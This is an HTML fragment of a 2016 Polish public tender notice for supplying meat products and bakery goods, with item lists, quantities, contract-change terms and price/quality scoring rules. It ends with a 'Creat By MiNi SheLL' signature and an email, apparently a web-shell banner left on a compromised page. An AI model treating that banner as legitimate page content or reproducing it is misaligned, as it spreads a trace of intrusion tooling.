              <br /><div style="padding-left: 20px">nie dotyczy</div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />
Zamawiający dopuszcza możliwość zmian postanowień umowy w zakresie :
1)	zmiany przepisów prawnych, w tym zmiany podatku VAT o różnicę wynikającą z jej dotychczasowej wielkości a wprowadzoną zmianą,
2)	zmiany nazwy towaru w przypadku, kiedy nowy towar spełnia wszystkie parametry towaru, który przestał być wytwarzany,
3)	zmiany okoliczności, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, a wartość nie przekracza 50% wartości określonej w pierwotnej umowie,
4)	zmiany okoliczności, których nie można było przewidzieć w chwili zawierania umowy, a ich wartość nie przekracza 50% wartości pierwotnie określonej w umowie.
5)	wprowadzenia zmian korzystnych dla Zamawiającego,
6)	wystąpienia sytuacji  niezależnych od stron umowy i działania siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mające wpływ na realizację umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />nie dotyczy<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />nie dotyczy<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 04/10/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa  mięsa i przetworów mięsnych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>WYSZCZEGÓLNIENIE
TOWARU	JEDN. MIARY	ILOŚĆ	CENA 
NETTO
( zł )	

CENA 
BRUTTO
(ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)	
Baleron gotowany
(min 84 % mięsa wieprzowego, wędzonka  z peklowanych karczków wieprzowych bez kości,, barwa od brązowej do ciemnowiśniowej )	kg	  50				
Blok tostowy
(min 45% mięsa wieprzowego, drobno rozdrobnionego)	kg	  50				
Boczek wędzony
(min 45 % mięsa wieprzowego, bez żeberek, wędzony parzony, barwa mięsa- różowa, barwa tłuszczu- biała)	kg	200				
Boczek z pieca
(min 85 % mięsa wieprzowego, w formie rolady boczkowej)	kg	50				
Bułczanka, żymlok, 
(smak charakterystyczny dla wędliny podrobowej parzonej, z dodatkiem  krwi, wyczuwalne przyprawy, batony w osłonce naturalnej , na przekroju wyraźnie widoczna pokrojona  bułka w kostkę, barwa właściwa dla surowców mięsnych podrobowych i krwi, barwa szrobrunatna z jaśniejszymi plamkami)	kg	 100				
Flaczki wołowe,
 (krojone  blanszowane, czyste)	kg	 192				
Frankfuterki
(min 85 % mięsa wieprzowego, średnio rozdrobnione, krótkie kiełbaski,- ok 78 gr, w osłonkach naturalnych, barwa od różowej do czerwonej, składniki równomiernie rozłożone)	kg	 20				
Golonko peklowane
(paczkowane 200 g)
( konsystencja dość ścisła, jędrna, smak łagodny, wyczuwalne przyprawy : majeranek, ziele angielskie, liść laurowy, czosnek, pieprz, barwa od jasnobrązowej do brązowej)	szt.	200				
Golonko prasowane
(produkt blokowy, grubo rozdrobniony, z mięsa wieprzowego i przypraw; charakterystyczny smak szynki z konserwy w postaci grubych batonów o długości ok. 30-40 cm i średnicy ok. 10 cm)	kg	120				
Kabanosy drobiowe, wieprzowe	kg	60				
Karkówka wieprzowa b/k
( mięso świeże, nie mrożone)	kg	1700				
Kiełbasa biała 
( z mięsa wieprzowego,nie wędzona, parzona, średnio rozdrobniona, nietrwała w osłonce z jelita naturalnego, min. 82% mięsa wieprzowego)	kg	40				
Kiełbasa wiejska
(w formie typowych wianków, delikatnie pomarszczona skórka o barwie ciemnobrązowej; na przekroju widoczne kawałki mięsa i tłuszczu o barwie różowo- szarej; konsystencja zwarta, krucha i łamliwa; smak i zapach charakterystyczny dla kiełbasy wędzonej z wyczuwalnym aromatem czosnku)	
kg	
200				
Kiełbasa kanapkowa	kg	         100				
Kiełbasa kminkowa 
(grubo rozdrobniona, z widocznymi ziarnami kminku, wieprzowo- wołowa, wędzona, parzona)	kg	80				
Kiełbasa krotoszyńska
 ( wieprzowo- wołowa, wędzona, parzona grubo rozdrobniona, smak i zapach charakterystyczny dla wyr. peklowanych, wędzonych, podsuszanych; batony w osłonkach sztucznych, o dł. 35- 45 cm i średnicy ok. 6,5-8 cm, barwa od jasnobrązowej do ciemnobrązowej)	kg	100				
Mielonka wieprzowa,
(w osłonce poliamidowej, bezbarwnej, sztucznej; osłonka powinna ściśle przylegać do batonu; mięso średnio rozdrobnione, równomiernie rozłożone, nie rozpadające się; po przekrojeniu lekko wilgotna; o zabarwieniu jasno- różowym; niedopuszczalne zacieki galarety)	kg	50				
Kiełbasa metka tradycyjna
(wołowa, z widocznymi kawałkami mięsa, kolor różowy)	kg	40				
Kiełbasa mortadela
( min 80 % zawartości mięsa, drobno rozdrobniona, barwa jasno różowa )	kg	100				
Kiełbasa rożnowa
( zawartość nie mniej 75 % mięsa, średnio rozdrobniona, wędzona, parzona, batony ok. 200- 250 gr. w osłonkach naturalnych, barwa jasnobrązowa) 	kg	400				
Kiełbasa podwawelska 
( z mięsa wieprzowego, średnio rozdrobniona, peklowana, parzona, wędzona, w osłonce naturalnej)	kg	800				
Kiełbasa mielonka prasowana wieprzowa
(z grupy mielonek, parzona, średnio rozdrobniona, wieprzowo- wołowa,  w osłonkach dużych lub średnich )	kg	120				
Kiełbasa szynkowa
( min 85% mięsa wieprzowego chudego, w osłonce sztucznej, grubo rozdrobniona; barwa na przekroju od jasno do ciemno różowej  wędzona, parzona, grubo rozdrobniona) 	kg	         100				
Kiełbasa piwoszki
 (z mięsa wieprzowego chudego, średnio rozdrobniona, wędzona, w osłonce sztucznej) 	kg	50				
Kiełbasa śląska
 (z mięsa wieprzowego, wędzona, parzona, średnio rozdrobniona; w jelitach cienkich  lub w średnich o długości od 12 do 14 cm, w zwojach , odkrecane )  	kg	700				
Kości wędzone
( ze schabu lub karczku) 	kg	60				
Kości świeże
( ze schabu lub karczku) 	kg	       1600				
Krupniok (kaszanka)
( o dł 15-18 cm, o grubości 5 cm, w jelicie wieprzowym, parzonym, barwa od szarobrązowej do ciemnoszarej, konsystencja jednolita; barwa farszu od brązowej do ciemnobrązowej) 	kg	         200				
Łopatka wieprzowa
( bez skóry, z niewielką ilością tłuszczu, 
barwa jasna) 	kg	1800				
Nóżki wieprzowe
(tylne, czyste, o barwie różowej) 	kg	300				
Ozory wieprzowe	kg	200				
Parówki grube 
(min. 76 % mięsa wieprzowego i tłuszczu wieprzowego, homogenizowana, w osłonce z jelita naturalnego, drobno rozdrobniona, kolor różowy, waga ok 100g)	kg	1200				
Parówki drobiowe lub wieprzowe,
(wędzona, parzona, drobno rozdrobniona, barwa od różowej do ciemnoróżowej, w osłonkach naturalnych lub sztucznych,waga ok. 70 g, osłonka ściśle przylegająca do farszu)	kg	500				
Pasztetowa wędzona extra 
(z mięsa oraz  podrobów wieprzowych, konsystencja ścisła, zawartość mięsa min. 41%, wędzona, barwa szaro- brązowa)	kg	180				
Pasztetowa biała 
( min. 30 % mięsa drobiowego) 	kg	           50				
Pasztet zapiekany wieprzowy
( barwa ciemnobrunatna, konsystencja ścisła, z mięsa i skórek wieprzowych z przyprawami, w  foremce prostokątnej)	kg	           60				
Płucka czyste	kg	100				
Podgardle wędzone	kg	25				
Polędwica drobiowa 
( min.70 % mięsa drobiowego, w osłonce barierowej, sztucznej, długość batonu ok. 20 cm, średnica ok 5 cm, barwa jasnoróżowa, smak soczysty, lekko  wilgotna )	kg	60				
Polędwica sopocka 
( min.80 % mięsa wieprzowego, parzona, krucha, soczysta, lekko wilgotna, niedopuszczlany wyciek soku po przekrojeniu, 
barwa złoto- pomarańczowa)	kg	80				
Salami
(zapach charakterystyczne dla danego wyrobu, np.: pieprzu, cebuli, ziół prowansalskich, papryki  itd..; konsystencja dość krucha, średnio rozdrobniona, z mięsa wieprzowego oraz tłuszczu wieprzowego, struktura dość ścisła, zwarta, nierozpadająca się; barwa naturalna dla mięsa peklowanego od biało  różowej do ciemnoczerwonej) 	kg	25				
Salceson ozorkowy 
( z podrobów wieprzowych, parzony, w pęcherzach żołądkowych, w przekroju widoczna kostka ozorów, bogato przyprawiany- w tym gożdzikami, konsystencja miękka, plastyczna )	kg	80				
Salceson z indyka
( min. 67 % mięsa z podrobów, w osłonce sztucznej, konsystencja ścisła)	kg	60				
Schab pieczony
( wędzonka wieprzowa z peklowanego schabu, min. 78% mięsa , parzony, otoczona przyprawami, soczysta, krucha, barwa od jasno brązowej do brązowej) 	kg	100				
Schab wieprzowy b/k
(kształt charakterystyczny  owal , barwa mięsa charakterystyczna,dla schabu ,  konsystencja ścisła, zwięzła) 	kg	           20				
Słonina świeża
( bez skóry, w płatach)	kg	100				
Słonina wędzona	kg	           60				
Smalec	kg	49				
Szynka gotowana
( wędzonka z górnej części szynki, bez kości i skóry, peklowana, wędzona,gotowana, barwa różowa, min. 81% mięsa wieprzowego) 	kg	200				
Szynka gotowana 
( paczkowane plastry -200 g) 	szt.	600				
Szynka wiejska 
( wędzonka wieprzowa, parzona, wiązana sznurkiem, barwa złocista, z małą zawartością tłuszczu)	kg	150				
Wątrobianka
( osłonięta naturalnym jelitem wołowym, barwa szaro złocista na przekroju widoczne rozdrobnione i wymieszane na smarowna masę składniki, smak charakterystyczne dla wątroby wieprzowej gotowanej wędzonej, umiarkowanie słony, z wyczuwalnymi przyprawami: pieprzem, majerankiem i cebulą)	kg	50				
Żeberka pasy
( ok. 10 cm pasy z małą ilością tłuszczu i 
min.1 cm warstwy mięsa, bez mostka) 	kg	300				
Kaszanka 
Produkt grubszy, ważący do 1,5 kg w osłonce jelitowej , koloru czrnofioletowego ( od krwi i kaszy)	kg	200				
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15100000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  129423.30<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>jakość</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Punktacja za cenę będzie obliczana według wzoru:
                                 cena oferty najniższej (brutto)
                      _______________________________________  x 60 punktów 
	                      cena oferty ocenianej (brutto)  

   Punktacja za jakość będzie przyznawana  w skali : 0  40 pkt ( J  = S + Z + K + W ), 
   poprzez ocenę próbek dostarczonych do oferty, biorąc pod uwagę następujące podkryteria :
  - walory   smakowe	( S =  0 -   10 pkt.),
   - zapach	( Z =  0 -   10 pkt.),
   - konsystencja	( K =  0 -   10 pkt ),
   - wygląd	( W = 0 -   10 pkt ).
<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>WYSZCZEGÓLNIENIE
TOWARU	JEDNOSTKA MIARY	ILOŚĆ	CENA JEDNOSTKOWA NETTO
( ZŁ)	

CENA JEDNOSTKOWA BRUTTO
( ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)
Baton- 350g	szt.	2800			
Bułka tarta	kg	150			
Bułka mleczna 80g 	szt.	3800			
Bułka pszenna duża 100g 	szt.	40000			
Bułka pszenna mała 45g 	szt.	500			
Chałka 300g	szt.	5			
Chleb mieszany 1000 g	szt.	25000	 		
Chleb razowy 500g	szt.	400			
Rogal 80g	szt.	1500			
Babka - różne smaki 100 g	szt.	50			
Baranek świąteczny 450g	szt.	30			
Ciastko W-Z lub inne kremowe  
waga ok. 145-15 g	szt.	1500			
Ciastko francuskie  różne smaki  80 g	szt.	400			
Ciasto jogurtowe	kg	60			
Ciasto z jabłkiem	kg	50			
Ciasto ze śliwkami 	kg	50			
Ciasto z posypką	kg	50			
Ciasto z serem	kg	10			
Muffinki	szt.	300			
Drożdżówka różne smaki 80 g	szt.	700			
Pączek  z nadzieniem 80 g	szt.	1000			
Strucla z makiem	kg	60			
Zając wielkanocny 450 g	szt.	20			
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15810000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  72868.47<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>jakość</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Punktacja za cenę będzie obliczana według wzoru:
                                 cena oferty najniższej (brutto)
                      _______________________________________  x 60 punktów 
	                      cena oferty ocenianej (brutto)  

   Punktacja za jakość będzie przyznawana  w skali : 0  40 pkt ( J  = S + Z + K + W ), 
   poprzez ocenę próbek dostarczonych do oferty, biorąc pod uwagę następujące podkryteria :
  - walory   smakowe	( S =  0 -   10 pkt.),
   - zapach	( Z =  0 -   10 pkt.),
   - konsystencja	( K =  0 -   10 pkt ),
   - wygląd	( W = 0 -   10 pkt ).
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com